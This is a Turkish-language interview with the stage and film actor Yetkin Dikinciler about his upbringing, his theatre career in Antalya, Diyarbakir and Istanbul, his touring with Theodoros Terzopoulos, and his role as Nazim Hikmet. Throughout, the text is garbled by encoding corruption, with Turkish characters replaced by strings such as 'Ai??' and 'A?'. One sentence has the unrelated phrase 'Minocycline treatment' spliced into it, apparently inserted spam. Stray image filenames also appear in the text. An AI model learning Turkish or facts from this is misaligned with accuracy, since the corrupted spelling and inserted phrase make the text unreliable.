Bu benzetme kA?ltA?rA?nde, kimselere benzemeyen, kimsenin ai???benzetemediAYiai??? biri Yetkin Dikinciler. Kendinden parAi??alara ayrAi??lan ve yine aynAi?? parAi??alarAi??n yerli yerine yerleAYmesiyle, yeniden toparlanan, kendi olan, bu varoluAYa Ai??zgA?ven ve AYefkat katan ailesine minnet duyan bir Ai??zgA?rlA?kAi??A? o.

Ai??oAYulcu korolara karAYAi??, onun telaAYsAi??z sesini seAi??ebiliyorum. O da biliyor ai???haksAi??zlAi??AYa karAYAi?? baAYAi??rmanAi??n insanAi??n sesini, Ai??fkelenmenin de yA?zA?nA? Ai??irkinleAYtirdiAYiniai???. SukAi??neti bundan. SAi??zlerindeki uysallAi??k aldatmasAi??n sizi, sAi??zcA?kler manA?nAi??n aracAi??. Diyalektik bir paslaAYma onunki, beden, akAi??l ve ses sAi??nAi??rlarAi??ndan taAYan. Bazen verdiAYi ai???esai???lerle, es geAi??ilmeyecek sAi??zler sAi??ylA?yor. Sesinin tAi??nlamasAi??, kalbin kapAi??sAi??nAi?? Ai??alacak tA?rden. AAi??mamak olmazdAi??.

EAYer inanAi??rsanAi?? mucize gerAi??ekleAYir diyor. Ben ise, onun mucize olduAYuna inananlardanAi??m. YeteneAYi ile yarattAi??AYAi?? yaAYamlarAi??n, yaklaAYtAi??AYAi?? hayatlarAi??n, bedeninden inanAi??la Ai??Ai??kardAi??AYAi?? tA?m bu kiAYilerin gerAi??ekte var olduAYuna yemin edebilirim.Ai??

Tiyatro Ai??ldA? diyenler Ai??lA?yor da, tiyatronun cesedini bulamAi??yor kimse. BA?tA?n saAYaltAi??cAi?? tanrAi??lara, o AYifacAi?? kadAi??nAi??n nefesi de ekleniyor. Ve biz Yetkin Dikincilerai??i??in o kocaman bedeninde barAi??nan yA?zlerce Ai??ocukla, tiyatronun sAi??AYAi??naklarAi??nda, ateAYi yeniden yakAi??yoruz.Ai??

IMG-20160613-WA0011

Ai??nce Minocycline treatment o sizi Ai??zgA?venle, AYefkatle ve Ai??zgA?rce bA?yA?ten ailenize bir teAYekkA?r edelim. AdAi?? dedeniz askerdeyken oAYlu oldu sanAi??lAi??rken kAi??zAi?? olduAYu Ai??AYrenildiAYinde ai???Kaderai??? konulan annenize. Size her sarAi??ldAi??AYAi??nda ai???sen biraz daha mAi?? uzadAi??nai??? diyen, Yozgatai??i??ta sizin iAi??in beAY yAi??llAi??AYAi??na iAYini bAi??rakan, Ai??Ai??apa Ortopediai??i??de hemAYire olan ve sizin baAY aAYrAi??larAi??nAi??za dikkat Ai??ekerek, hayatAi??nAi??zAi?? kurtaran annenize; parlak bir futbol hayatAi?? olabilecekken Kuleli Askeri Lisesi’ne yazdAi??rAi??lan, sonrasAi??nda yaptAi??AYAi?? uAi??urtmalarla YeAYilkAi??y polisinin bile dikkatini Ai??eken babanAi??z Selahattin Beyai??i??e; kahramanAi??nAi??z, sifacAi?? annannenize, Kaya DayAi??ai??i??ya, eli mA?thiAY lezzetli yengenize, Ai??ocukken omzunuza dokunup ai???onlar eAYekai??? diyen, birlikte ai???gA?rA?ltA?lA? bir huzur ortamAi??nda bA?yA?dA?AYA?nA?zai??? Ai??kuzeniniz Tanai??i??Ai??n nezdinde tA?m aileyeai??i?? Aksarayai??i??daki apartmanaai??i?? Yetkinai??i??liAYinizeai??i??
Ben kalkayAi??m siz kendi kendinize bitirirsiniz rAi??portajAi?? valla. Bu kadarAi??nAi?? arka arkaya ben bile hatAi??rlayamayabilirim. AklAi??ma Jorge Luis Borgesai??i??in, 10 yAi??l evvel okuduAYum ai???DA?AYsel VarlAi??klar KitabAi??ai??? geldi. Oradaki Ai??ykA?lerden Ai??birinde, AYimdiye kadar hiAi?? hayal edilmemiAY bir canavarAi??n hikaye edilmesi vardAi??. HiAi?? daha Ai??nce tasarlanmamAi??AY bir canavar hayal edin. Zihninizde hayal ettiAYiniz ve hiAi?? hayal edilmediAYini dA?AYA?ndA?AYA?nA?z canavar imgelemi, AYimdiye kadar hayal edilmiAYlerin parAi??alanAi??p, yeniden bir araya gelmesinden baAYka bir AYey deAYildir. Ai??AYte ben de, tA?m bunlara daAYAi??lmAi??AY, ve yine bunlardan toplanmAi??AYAi??n dAi??AYAi??ndan baAYka bir AYey deAYilim aslAi??nda. Tam da evren gibi, hayat gibi. ParAi??alarAi??n bir araya gelmesi. Tek parantez ekleyebilirim. Bunun bir Ai??zbenlik olarak farkAi??ndalAi??AYAi??… BunuAi?? saAYladAi??klarAi??, bu kadar daAYAi??lAi??p yine toplanAi??p, beni Yetkin yapan AYeyler iAi??in ve beni ben yaptAi??klarAi?? iAi??in minnettarAi??m onlara. HiAi?? deAYiAYmeyen Ai??zgA?veniyle bir ben. Ai??zgA?ven derken kendine gA?venden bahsetmiyorum: VaroluAYuna minnettar, var olduAYu iAi??in de gA?Ai??lA? bir Yetkin. TA?m gA?Ai??sA?zlA?kleri ve zaaflarAi??yla gA?Ai??lA? bir Yetkin.

Okul yaAYamAi??nAi??z boyunca matematikten ai???0ai??? alAi??namayacaAYAi?? iAi??in ai???1ai??? alan bir Ai??AYrencisiniz. Bunun baAYlangAi??cAi?? ilkokul Ai??AYretmeninize kadar gidiyor. O kAi??rAi??lan Ai??ocuk kalbi Ai??ok sorular soruyor sonradan, felsefeyle ilgileniyor. Belki de dolaylAi?? olarak Ai??AYretmeninizin tavrAi?? -tabiatAi??nAi??z bAi??yle olduAYu iAi??in- yolunuzun tiyatroya Ai??Ai??kmasAi?? kadar etken. Tereciye tere satmak o gA?nlerden geliyor.
Ai??ok haklAi??sAi??nAi??z, dolaylAi?? deAYil, bence doAYrudan tiyatroya giden yolu aAi??Ai??yor. Tiyatroda, sahnede olmak, utangaAi?? bir Yetkinai??i??in her gA?n utancAi??yla savaAYAi??dAi??r. Hayata karAYAi??, kendine karAYAi??, mahAi??up bir Yetkinai??i??in varoluAYun gA?cA?nA?, tabiatAi??n gA?cA?nA? ve onun iAi??indeki kA?Ai??A?klA?AYA?nA?n de gA?cA?nA? fark etmesidir. Belki de bunu her gA?n kendime hatAi??rlatmak iAi??in sahnedeyim. Ai??Ai??imde Ai??ok hissettiAYim ama ben olmayan birine yaklaAYmak iAi??in. YeryA?zA?nde ne kadar insan varsa, o kadar hayat var ve hepsi anlatAi??lmaya deAYer.

IMG-20160613-WA0005

ai???EAYer inanAi??rsan mucize gerAi??ekleAYir. Ailenize yA?k olmamak iAi??in aldAi??AYAi??nAi??z kitapla A?niversiteye hazAi??rlanAi??yorsunuz ve 3 matematik sorusu yaparak sAi??navAi?? kazanAi??yorsunuz. Fen BAi??lA?mA?ai??i??nden mezun olup Ai??stanbul A?niversitesi Edebiyat FakA?ltesi Felsefe BAi??lA?mA?ai??i??nA? kazanan tek Ai??AYrencisiniz muhtemelen. Sonra ikinci bir mucize gerAi??ekleAYiyor, O yAi??l iAi??in kaldAi??AYAi?? tek ders yA?zA?nden, kazandAi??AYAi?? A?niversiteye kayAi??t yaptAi??ramayanlar iAi??in af Ai??Ai??kAi??yorai???. KayAi??t da tamam oluyor bAi??ylece. Okulda Ai??arAYamba gA?nleri YAi??ldAi??z Kenter ders veriyor. Orhan Veliai??i??nin AYiirleri okunuyor, Federico Garcia Lorcaai??i??nAi??n ai???Yermaai??? oyunu oynanAi??yor. Derken YAi??ldAi??z Kenter: ai???Felsefe evde de Ai??AYrenilir, Sen bu iAYe, bu iAY de sana iyi gelecekai??? diyor ve Mehmet Birkiye ve Celal Kadri KAi??noAYluai??i??nun da desteklemesiyle MA?AYfik Kenterai??i??in okuluna gidiyorsunuz. Tarihin tecellisi.
Evet, felsefeyi evde de yaparsAi??n dedi. O da bir yol ayrAi??mAi??, o da bir kader oldu.

1993ai??i??te Mimar Sinan A?niversitesi Devlet KonservatuarAi??ai??i??ndan mezun olduAYunuzda kadro sAi??navAi??nAi?? kazanamayAi??ncaAi?? iki yAi??l Antalya Devlet Tiyatrosuai??i??nda, dAi??rt yAi??l da DiyarbakAi??r Devlet Tiyatrosuai??i??nda Ai??alAi??AYAi??yorsunuz. Bu, Mustafa AvkAi??ran ile birlikte Antalya Devlet Tiyatrosuai??i??nun resmi kurumlaAYmasAi??na denk geliyor.
Biz bAi??lgeler iAi??in girdik sAi??nava ama seAi??ilemedik. Bunun da sohbetini hep yaparAi??z arkadaAYlarla. SAi??navda AnkaralAi?? hocalarAi??mAi??z vardAi?? ve AnkaralAi?? Ai??AYrencilerini Ai??ncelikli almaya Ai??alAi??AYAi??rlardAi??. Torpilliler var ama yetenek de bir AYeydir dediler. Bize de kAi??yamadAi??lar. En azAi??ndan yedek yaptAi??lar bizi. Bir yAi??l sonra DiyarbakAi??rai??i??da gAi??revi kabul etmeniz halinde, Antalya Devlet Tiyatrosuai??i??na giriAYiniz uygundur dediler. Hemen, imzaladAi??k, baAYladAi??k DiyarbakAi??rai??i??da. Zor gibi gAi??rA?nen bir AYey. Ben Ai??stanbulai??i??da doAYup bA?yA?dA?m, BatAi??lAi?? Ai??ocuAYuyum yani. Ai??AYte bu da bir baht dAi??nA?AYA?. HayatAi??mAi??n en gA?zel yAi??llarAi??nAi?? yaAYadAi??m DiyarbakAi??rai??i??da.

1999 yAi??lAi??nda tayinle Ai??stanbul Devlet Tiyatrosuai??i??na gelinceye kadarAi?? DiyarbakAi??r Devlet Tiyatrosuai??i??nda ai???KanlAi?? DA?AYA?nai???, ai???DA?dA?kAi??A?lerle FAi??rAi??acAi??larAi??n SavaAYAi??ai???, ai???Tartuffeai???, ai???CanlAi?? Maymun LokantasAi??ai???, ai???KaAi?? Baba KaAi??ai??? gibi oyunlarAi?? Ai??alAi??AYAi??yorsunuz. Baba mesleAYinden alAi??AYAi??ksAi??nAi??z zaten il il gezmeye, baAYka insan ve kA?ltA?rle temas etmeye. Ve daha Ai??stanbulai??i??da tanAi??nmazken DiyarbakAi??r’da AYAi??hretiniz baAYlAi??yor. Halk, Ai??sanAi??lanAi??n aksine tiyatroya Ai??ok meraklAi??, oyunlarAi?? defalarca izliyorlar. BAi??ylece tiyatro, artistik dA?zeyden yaAYama geAi??iyor.

IMG-20160613-WA0009Seyirci orada oynayan bA?tA?n oyuncularAi?? baAYtacAi?? ediyordu. Binlerce yAi??llAi??k kA?ltA?r, medeniyetler birikimi orasAi??. BatAi??ai??i??dan bakAi??lan AYey deAYil yani. Zaten hep bu Ai??nyargAi??yla, cebimizdekiyle yaklaAYmak, A?lkede Ai??atAi??rdama yaratAi??yor. Ben de o illA?zyona kapAi??labilecekken BatAi??ai??i??dan; hayat bana,Ai?? ai???sen buna kapAi??lmayAi?? hak edecek birisi deAYilsin; sen git fark et onuai??? dedi. Orada yaAYayanAi?? anlamak iAi??in televizyondan izlemek, gazeteden okumak, onun hakkAi??nda konuAYulanAi?? dinlemek yeterli deAYil. Anlamak iAi??in, orada, onun yanAi??nda olmak gerek diye dA?AYA?nA?yorum. Bunu yaAYadAi??AYAi??m iAi??in de kendimi AYanslAi?? hissedenlerdenim. Mesleki olarak da Ai??stanbulai??i??un o ai???piyasaai??? koAYullarAi??nAi??n dAi??AYAi??nda kalmak, korunmak demek oldu benim iAi??in. Kendi iAi??imizin geniAYlediAYi yerler oldu.

Yani hocanAi??z MA?AYfik Kenterai??i??in dediAYini yapAi??yorsunuz, nereye giderseniz gidin, soluAYunuzu gAi??tA?rA?yorsunuz. Bana Ai??yle gA?zel AYeyler hatAi??rlatAi??yorsunuz ki, Ai??ok teAYekkA?r ederim. O isimlerin tekrar anAi??lmasAi?? benim iAi??in Ai??ok deAYerli. Sonuna kadar anarAi??m o isimleri. Son sAi??zA?m bile olsa ai???MA?AYfik Kenterai??? derim.

Ai??stanbulai??i??a dAi??ndA?AYA?nA?zde, Ai??stanbul Devlet Tiyatrosuai??i??nun yanAi??sAi??ra Ai??zel tiyatrolarla da Ai??alAi??AYAi??yorsunuz. Ai??ok gAi??steriAYli bir arAYiviniz var. YapmadAi??klarAi??nAi??z da yaptAi??klarAi??nAi??z kadar Ai??nemli. SeAi??imlerinize bakmak lazAi??m. Dostlar mizansende gAi??rsA?n dememiAYsiniz.
Bu A?lkede Devlet Tiyatrosu olsun mu, devletin tiyatrosu olur mu, kapatAi??lsAi??n mAi?? gibi sorular sahte. Bir mekA?nAi??mAi??z var. Ai??ster Devlet Tiyatrosuai??i??nun iAi??inde, ister sokakta, ister Ai??atAi??da, ister bodrum katAi??nda olsun fark etmez. Ai??nsan iAi??in, insana yaklaAYmak iAi??in, bir hikayemiz var ve bunu anlatacak bir mekA?nAi??mAi??z var. Bu kadar. Gerisi seyirciyle aramAi??zda organik paylaAYtAi??AYAi??mAi??z bir AYeydir. Tiyatronun kapanmasAi?? bu A?lkede Ai??nceliklerden birisi deAYildir.

Herakles A?Ai??lemesi
Herakles A?Ai??lemesi

Bu sefer de Ai??Ai??stanbulai??i??dan Ai??nce Yunanistanai??i??da tanAi??nAi??yorsunuz. O yAi??l TA?rk ve Yunan genAi??lerini buluAYturmak iAi??in dA?zenlenen tiyatro festivalinde sahne alAi??nca, Attis Tiyatrosu’nun yAi??netmeni ai???Theodoros Terzopoulosai??? ile tanAi??AYma ve Ai??alAi??AYma fAi??rsatAi?? buluyorsunuz. Ai??KSV ile ortak projeler yapAi??yorsunuz. Ai??ai???Herakles A?Ai??lemesiai???, ai???Zincire vurulmuAY Prometheusai??? ve ai???Filoktetesai???i oynuyorsunuz onunla.
Daha dA?n telefonla konuAYtuk kendisiyle. Hayat nasAi??l izin verir bilmiyorum ama yeni bir projemiz var yapmayAi?? dA?AYA?ndA?AYA?mA?z. Berlinai??i??e gittik. Tiyatrosunun (ATTAi??S) yAi??ntemini bir TA?rk aktAi??r A?zerinden denedi. Bu benim iAi??in Ai??okAi?? onur verici bir AYeydi. Bu AYAi??ven bir yaklaAYAi??mla A?lkem adAi??na, bu topraklarAi??n insanlarAi?? adAi??na gurur duydum demekten Ai??te, sAi??nAi??rlarAi?? kaldAi??ran bir yaklaAYAi??mAi??n mA?mkA?n olduAYunu bedenimde deneyimlemem iAi??in de Ai??ok Ai??nemliydi. Hikayeleri sAi??nAi??rlarAi?? aAYarak paylaAYmanAi??n peAYinde olmamAi??z lazAi??m. Bunun mA?mkA?n olduAYunu gAi??rmek benim Ai??ok hoAYuma gitti. Berlinai??i??de A?niversitat der Kunztai??i??da tA?m hocalara, Ai??AYrencilere, meraklAi??lara ben sahnedeAi?? Prometheousai??i??u oynuyorum. Sonra da terim A?zerimde, sahnede oturuyorum. Ve baAYlAi??yoruz soru-cevap konuAYmaya. Bu yAi??ntem nasAi??ldAi??, insanAi??n acAi??sAi?? nedir, milattan Ai??nce neydi, bugA?n nedir, tragedya nedir, dram nedir? Bunlar anlatAi??lAi??yor. Bunlar, iAi??inden geAi??ilen Ai??ok gA?zel koridorlar diye dA?AYA?nA?yorum.

Attis Tiyatrosu’nun TA?rk konuk oyuncusu olarak Kolombiya, Ai??spanya, Almanya, Japonya, Brezilya, Yunanistan gibi A?lkeleri dolaAYAi??yorsunuz. Madridai??i??de kumda prova yaparken Terzopoulos, “arkadaAYlar burayAi?? seyirci iAi??in dA?zelteceAYiz dediAYinde siz o yuvarlak sahnenin merkezinden tAi??rmAi??kla sarmallar oluAYturarak dAi??nmeye baAYlAi??yorsunuz. Ve Terzopoulos, yukardan, Ai??AYAi??k oldasAi??ndan, “Tamam dekorumuz bu Yetkin, bu harika, teAYekkA?rler” diyor.
O dA?z tahta Ai??ekAi??ekle ben de ekiple beraber merkezden baAYladAi??m, dAi??ne dAi??ne dAi??AYarAi?? doAYru gidiyorum daire yaparak. ai???Yetkinai??i??ciAYim iAYte dekor buai??? dedi. Ai??ok enteresandAi??. Sahneye gelindiAYinde gA?neAY batarken Ai??AYAi??klar onu yalAi??yordu bAi??yle. Ai??Ai??AYte oyun paylaAYmak, oyun arkadaAYAi?? olmak, yAi??netmenin de benimle oyun arkadaAYAi?? olmasAi??, gAi??rdA?AYA?nA? hemen oraya katmasAi??, kabul etmesiai??i?? Milim milim hayat devam ediyor.

O A?lkeleri ve katAi??ldAi??AYAi??nAi??z festival yerlerini dolaAYAi??rken oyunlarAi?? izlemeyi unutmuyorsunuz deAYil mi?
HayAi??r, tabii ki unutmuyorum, olur mu Ai??yle AYey!

Mavi GAi??zlA? Dev

Tiyatro Peraai??i??da ai???Ai??lA?m ve KAi??zai???Ai?? oynadAi??ktan sonra fuayede, ara ara size bakan gAi??zler hissediyorsunuz. O gAi??zler meAYer Biket Ai??lhanai??i??Ai??nmAi??AY ve onlar, sizin mavi gAi??zlA? dev olduAYunuzu gAi??ren gAi??zlermiAY. Sonra ai???Kaygusuz Abdalai???Ai?? oynarken sizi arAi??yorlar veai???Bizim NazAi??mai??i??Ai??mAi??z olur musun?ai??? diye soruyorlar.
O yAi??l Tiyatro Pera profesyonel olarak kuruluyor. Nesrin Kazankaya da hA?lA? gA?mbA?r gA?mbA?r devam ediyor. Orada da 50-55 kiAYilik bir salonda, ilk oyunumuzla kendimizce gala yapAi??yoruz. Oyundan sonra ben, AyAYe (Lebriz), Devrim (Nas) keyfini Ai??Ai??karAi??yoruz. Ben zaten Ai??ok severim, bir AYeyi A?rettikten sonra, onun tadAi??nAi?? Ai??Ai??karmayAi??. EAYlenmek, A?retim A?zerinedir benim iAi??in. Koridordan geAi??enler oluyor, arada birileri de bana bakAi??yor. Bir baktAi??m, Biket Ai??lhan bakAi??yor. Oyunu izlemiAY, geldi tebrik etti. Sonra da, ai???Sana niye bakAi??yorum biliyor musun?ai??? dedi. ai???Bilmiyorumai??? dedim. Telefonumu rica etti, verdim. Bir gA?n, ai???Kaygusuz Abdalai???Ai??n turnesine Ai??Ai??kmak A?zereyken, Devlet Tiyatarosuai??i??ndan arkadaAYAi??m olan Metin Belgin aradAi??. Senaryoyu verdi. Daha okumadan ai???A, NazAi??mai??i??Ai??n filmini mi yapAi??yorsunuz? Ne gA?zelai??? dedim. Yol boyu senaryoyu okudum, varAi??nca aradAi??m, ai???Teknik olarak konuAYulacak Ai??ok AYey var. Senaryo bAi??yle mi olmalAi??, NazAi??m bAi??yle mi anlatAi??lmalAi?? A?zerinden Ai??ok konuAYabiliriz ve ben bunlarAi?? konuAYmak isteyenlerdenimai??? dedim ve ekledim, ai???NasAi??l, ne zaman yapacaksAi??nAi??z?ai???Ai?? ai???Ai??AYte AYu zaman, para bulunca yapacaAYAi??zai??? falan dediler. ai???Peki benden ne istiyorsunuz?ai??? dedim. ai???NazAi??mai??i??Ai??mAi??z olur musun?ai??? dediler. ai???Olmaz mAi??yAi??m!ai??? dedim ben de. ai???Olmaz mAi??yAi??mai??? aslAi??nda ai???olur muyumai??? demek aynAi?? zamanda. Ai??ok heyecanlandAi??m.

Tabii fiziksel benzerlikten Ai??te bir kavrayAi??AY sAi??zkonusu. Ona ruhen de yaklaAYabilmek Ai??nemli. YAi??llar Ai??nce konservatuardan sAi??nAi??f arkadaAYAi??nAi??z Devrim Nas’Ai??n annesi Semra HanAi??m da o benzerliAYi ilk gAi??renlerden ve size, ai???Sen bir gA?n NazAi??m’Ai?? oynayacaksAi??nai??? diyenlerden.
Biketai??i??in sAi??ylediAYi bir AYey var. ai???NazAi??mai??i??a benzerlik tabii ki aranmasAi?? gereken bir AYey ama ben yAi??netmen olarak, ruhumla yaklaAYmaya Ai??alAi??AYAi??yorum NazAi??mai??i??a. Ona da ruhuyla yaklaAYacak bir oyuncuya ihtiyacAi??m var. Onun sen olduAYunda Ai??srarcAi??ydAi??m. O yA?zden seninle buluAYtumai??? dedi. Onun cA?mlesi olduAYu iAi??in ben de mutlulukla sAi??yleyebiliyorum. Ben de NazAi??mai??i??Ai??n ufkuna yaklaAYabildiAYim iAi??in mutlu oldum. Eksiklerimiz var. NazAi??m kolay anlatAi??lmaz. Hemen bir Ai??zeleAYtiri yapayAi??m. EAYri oturalAi??m, doAYru konuAYalAi??m. Bu AYartlarda hiAi?? kimse elini taAYAi??n altAi??na koymuyor. Ai??AY yapmaya gelince, herkesin saAYdan soldan fAi??ydAi??AYAi??nAi?? gAi??rdA?k, tehlikeli bulduklarAi??nAi?? gAi??rdA?k. BugA?n de bunu yaAYayabiliriz. BugA?n, polis bir Ai??ocuAYu Ai??evirse ve onun Ai??antasAi??ndan NazAi??mai??i??Ai??n bir eseri Ai??Ai??ksa, nasAi??l bakacaAYAi??nAi?? hepimiz biliyoruz. Bunu hiAi?? tartAi??AYmayalAi??m. BA?yA?k bA?yA?k laflarAi?? bAi??rakalAi??m. Liderlerin, siyasetAi??ilerin sAi??ylediAYi Ai??zgA?rleAYme var ya; Ai??zgA?rleAYmeden Ai??nce, zihinlerdeki Ai??rA?mcek aAYAi??nAi?? unutmayalAi??m.

mavi-gozlu-dev-replikleri

Filmin Ai??ekildiAYi gA?nlerde Ai??ok yoAYunsunuz. Ai??AYte o gA?nlerden birinde, eve gelip birkaAi?? saatliAYine uyuyacakken tam, baAYucunuzdaki NazAi??mai??i??Ai??n kitabAi??na iliAYiyor gAi??zA?nA?z ve ai???Allah allah niye kendi fotoAYrafAi??mAi?? bastAi??rmAi??AYAi??m kiai??? diye bir anlAi??k da olsa iAi??inizden geAi??iriyorsunuz. Benzerlik o derece.
MakyAi??z Derya ErgA?n ile o imajAi?? yakalamaya Ai??alAi??AYAi??yoruz. Mehmet diye kuafAi??r bir arkadaAYAi??mAi??z var. Hep sevgiyle, saygAi??yla andAi??AYAi??m, iAYine aAYAi??rAi?? baAYlAi?? biri. Film, Beykoz Kundura FabrikasAi??ai??i??nda Ai??ekiliyor ve orada bAi??rakAi??n sAi??cak suyu;Ai?? akan su bile yok. Mehmet, ai???kettleai???da su Ai??sAi??tAi??yor, ben saAi??larAi??mAi?? yAi??kAi??yorum, fAi??n Ai??ekiyoruz ve tekrar o AYekli veriyoruz falan. Biliyorsunuz Ai??ekim tekniAYinde, birinci sayfadan sona doAYru gidilmiyor. BazAi?? sahneler, maddi, manevi sebeplerle, zamandan da kazanalAi??m diye toplanAi??yor. Biz de hA?cre sahnelerini A?st A?ste 5-6 gA?nde Ai??ektik. Sahneler arka arkaya Ai??ekilirken, aynAi?? zamanda bir televizyon iAYim var, prova var, oyun var. GerAi??ekten eve gidip uyuyacak, duAY alacak vaktim yok. Bir setten, diAYer sete giderken trafik var mAi?? diye soruyordum. Levent, ai???var abiai??? derse, ai???oh ne gA?zel, uyuyabilirim birazai??? diyordum. Hatta bA?yA?kAi??ekmeceai??i??de falansa set ai???oho, rA?ya bile gAi??rA?rA?mai??? diyordum. Ai??AYte sizin dediAYiniz de o uykuyla uyanAi??klAi??k arasAi??ndaki zamanlardan birinde yaAYandAi??. A?Ai?? gA?n geAi??miAY, artAi??k evin ev, benim de Yetkin olduAYumu hatAi??rlayayAi??m diye, eve gittim, duAYumu aldAi??m, AYAi??yle bir saatliAYine kestireceAYim, saatimi kurdum, baAYucumda o Ai??alAi??AYtAi??AYAi??m belgelere baktAi??m. ai???Ya, niye fotoAYrafAi??mAi??ai??i??ai??i?? derken, ai???aaaai??i?? NazAi??mai??i??ai??i??

NazAi??m Hikmet, dA?AYA?nceleri, AYiirleri yA?zA?nden hapis ediliyor. Kabahat iAYlemiAY sayAi??lAi??yor ve A?zerine yasa Ai??Ai??karAi??lAi??yor. O boAYu boAYuna hapis yatAi??lan yAi??llar, sizin boAYazAi??nAi??zAi?? dA?AYA?mlerken, yine NazAi??m anlatAi??yor bu durumu; ai???Mesele esir dA?AYmekte deAYil, bA?tA?n iAY teslim olmamaktaai???.
Orada da dA?AYA?ndA?AYA?m AYu oldu. Ben altAi?? gA?n yoAYunlukla hapis sahneleri Ai??ekilirken bir anlamda hapis oldum ve taklidini yaparken mahvoldum. Hep burnumun direAYini sAi??zlatAi??r bu durum. Ben oynuyorum; NazAi??m yaAYadAi??! Ama bA?tA?n bunlarAi??n da karAi??AYtAi??AYAi?? bir zamandayAi??z. Hep aidiyetler A?zerinden konuAYmaya baAYladAi??k, hep olduAYumuz yerdenai??i?? BA?yA?k bA?yA?k konuAYturacaksAi??nAi??z beni AYimdi. Kendimizi bAi??raktAi??k, sAi??ylediAYi doAYru olan insanlarAi?? aramaya baAYladAi??k. Kendi sAi??zA?mA?zA? unuttuk, ai???Biri bizim yerimize cA?mleler kursunai???un peAYinden gitmeye baAYladAi??k. CA?mleler bA?yA?dA?kAi??e de hayatlarAi??mAi??z kA?Ai??A?ldA?. Bizim yerimize sesler bA?yA?dA?. Kendi sesimizi duyamaz olduk. Bu bir felaket. Ai??KSVai??i??nin 2010 Ai??stanbul kA?ltA?r baAYkenti projesi kapsamAi??nda RumelihisarAi??ai??i??nda ai???Prometheusai???u oynarken, ai???Zincire VurulmuAY Prometheusai???ai??i??Ai?? Ai??nsanlAi??AYa ateAYi armaAYan eden Prometheusai??i?? Zeusai??i??a karAYAi?? Ai??Ai??kan ve ciAYeri parAi??alananai??i?? KartalAi??n gelip her gA?n ciAYerini yediAYi Prometheus… Ai??AYkence de devam ediyor; orada bitmiyor. Yani hayat devam ettikAi??e, ciAYerimiz yenilecek. Prometheus kahraman olarak bir tek AYey sAi??ylA?yor: ai???Kahraman aramayAi??nAi??zai??? diyor. Ai??nsana ateAYi fark ettiriyor. Bunu bir metefor olarak dA?AYA?ndA?AYA?nde; insanAi??n varouluAYu, yapma, etme, eyleme Ai??zgA?rlA?AYA? olduAYu hatAi??rlatAi??lAi??yor aslAi??nda milattan Ai??nce. TanrAi??lar sAi??ylemiAY bunu, ama o ai???TanrAi??ai???larAi?? insanlar yazmAi??AY. Ai??nsan eliyle her AYey. Ai??hale etmeyelim, ihale Ai??Ai??karmayalAi??m, baAYkasAi??ndan beklemeyelim. Biz varAi??z! VarlAi??AYAi??mAi??za saygAi?? duyalAi??m ve saygAi?? duyulmasAi??nAi?? talep etmeye devam edelim. NazAi??m bu yA?zden Ai??ok acAi??klAi?? bir hikayedir. Kendi gibi olmaya devam etti, sonuna kadar da bedeller Ai??dedi. Hasretlik Ai??ldA?. Olsun. BaAYka tA?rlA? iAi??in iAi??in Ai??lecekti.

IMG-20160613-WA0004

 

Hep kurtarAi??cAi?? bekliyoruz bugA?n. Bekleme, o sensin, sensin o!
HayatAi??n iAi??inde de Ai??yle, hep bir ihale Ai??Ai??karma, hep bA?yA?klerimiz bilir durumu… Onlar, bildiklerini zaten sAi??ylA?yorlar. Sen ne sAi??ylA?yorsun? Ai??Ai?? sesini unutma! Hep onun peAYindeyim. SAi??yleAYilere Ai??gittiAYimde, bana ai???ne tavsiye edersinizai??? dendiAYinde, ai???tavsiye almamanAi??zAi?? tavsiye ederimai??? derim. ai???Hatta dilerseniz, bu tavsiyemi de almayAi??nai??? derim. ai???NasAi??l deAYerlendirirsenizai???… Siyaseten de bunu getiriyor. Her dAi??nem iktidar vardAi??r ve her dAi??nem muhalefet vardAi??r. Ai??Ai??imizde, iktidara inanmadAi??AYAi??mAi??zda, muhalefetten bir AYey beklemek gibi bir yanAi??lgAi??ya dA?AYA?yoruz. Yine ihale Ai??Ai??karAi??yoruz. HayAi??r, hiAi??biri umut deAYil! Erk de, otorite de, muhalefet de umut deAYil. Umut sensin kardeAYim. YaAYmurdan kaAi??arken doluya yakalanma, iktidar yolunda bir muhalefetin ne anlamAi?? var!

Haluk Bilginer de AtatA?rkai??i??A? canlandAi??rdAi??AYAi??nda ai???ne hissttinizai??? sorusuna, biraz da onlarAi??n da zaaflarAi??yla ai???insanai??? olduklarAi??nAi?? kabullenmemiz, mitleAYtirmememiz iAi??in; ai???hiAi??bir AYey, sadece plastik makyajdan burnum kaAYAi??ndAi??ai??? diye cevap vermiAYti.
Bence NazAi??m olmak da, AtatA?rk olmak da bA?yA?k iAYler. Onlara yaklaAYmak asAi??l mesele. Bunlar fiziki detaylar; baAYrolde ise duygu var. AktAi??r olmanAi??n Ai??tesinde, ona daha Ai??ok yaklaAYabilmek, onun daha Ai??ok izini sA?rebilmekai??i?? Bu bA?yA?k bir ayrAi??calAi??k. Film bitip gAi??sterildikten sonra, NovodeviAi??iyai??i??de NazAi??mai??i??Ai??n mezarAi?? baAYAi??ndaki anma tAi??renlerine katAi??lAi??nca, TA?rkolog Swetlana Uturgauri hanAi??mefendinin bana bir sarAi??lAi??AYAi?? var, sen bize NazAi??mai??i??Ai?? getirdin diye. Bu gerAi??ekten tarife gelmeyen bir duygu. Bunu NazAi??mai??i??la birebir yaAYamAi??AY, ona genAi??ken hayran gAi??zlerle bakmAi??AY, onun idealleri uAYruna yaAYayAi??p Ai??len biri olduAYuna AYahit olmuAY birinden duymak tarife gelmez. Yine ona kA?Ai??A?cA?k hemAYireyken bakan, ona dokunmuAY birinin gelip bana dokunmasAi??, bana sarAi??lmasAi??, bana aAYAi??k gAi??zlerle bakmasAi??, ben NazAi??mai??i??a bakAi??yorum demesiai??i?? Bunlar oyunculuAYu da aAYan duygular. Ai??AYte sAi??nAi??rlarAi?? aAYmak da bAi??yle bir AYey. Ben sAi??nAi??rlarAi??mAi?? aAYAi??yorum, NazAi??mai??i??dan helallik istiyorum her seferinde bir anlamda. Seni oynadAi??m NazAi??m usta, gA?nahAi??m var mutlaka, belki Ai??yle oynanmamalAi??ydAi??, Ai??yle sAi??ylenmemeliydi, o duygu Ai??yle deAYildi belki o sahnede, yaAYadAi??AYAi??n da bAi??yle deAYildi belki ama biz seni anlatmaya deAYil; anlamaya Ai??alAi??AYtAi??k Ai??ncelikle diyorum.Ai??Filmde yine o gecelerden birinde, hA?creyi Ai??alAi??AYAi??rken, NazAi??mai??i??Ai?? oynadAi??AYAi??m iAi??in kendime sAi??z sAi??yleme hakkAi?? buldum. NazAi??m olsa ne derdi dedim ve NazAi??m olarak cevap verdim. ai???Ai??zgA?rce yapmadAi??AYAi??n hiAi??bir AYey senin deAYildir.ai??? 